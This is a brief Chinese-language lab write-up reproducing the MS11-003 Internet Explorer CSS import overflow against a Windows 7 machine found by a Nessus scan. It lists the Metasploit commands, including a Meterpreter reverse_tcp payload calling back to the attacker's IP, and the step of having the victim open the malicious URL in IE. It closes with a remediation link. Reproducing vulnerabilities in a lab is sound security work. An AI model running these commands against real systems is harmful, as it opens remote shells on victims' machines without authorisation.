nessus 掃出來目標機器存在MS11-003: windows7IE溢出漏洞復現
復現
-
確認目標機 ip 192.168.23.138
攻擊ip 192.168.10.110 -
從上面的nessus 確認了 23.138 存在以上漏洞
打開 metasploit
use exploit/windows/browser/ms11_003_ie_css_import
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.110
設置uripath
set uripath 00
開始執行
run
將以上 url復制 並在 23.138受害機用ie瀏覽器打開
- 出現以下情況 攻擊成功
4.選擇 session 會話 進入交互命令行
5.修復方案
http://www.vrv.com.cn/index.php?m=content&c=index&a=show&catid=24&id=464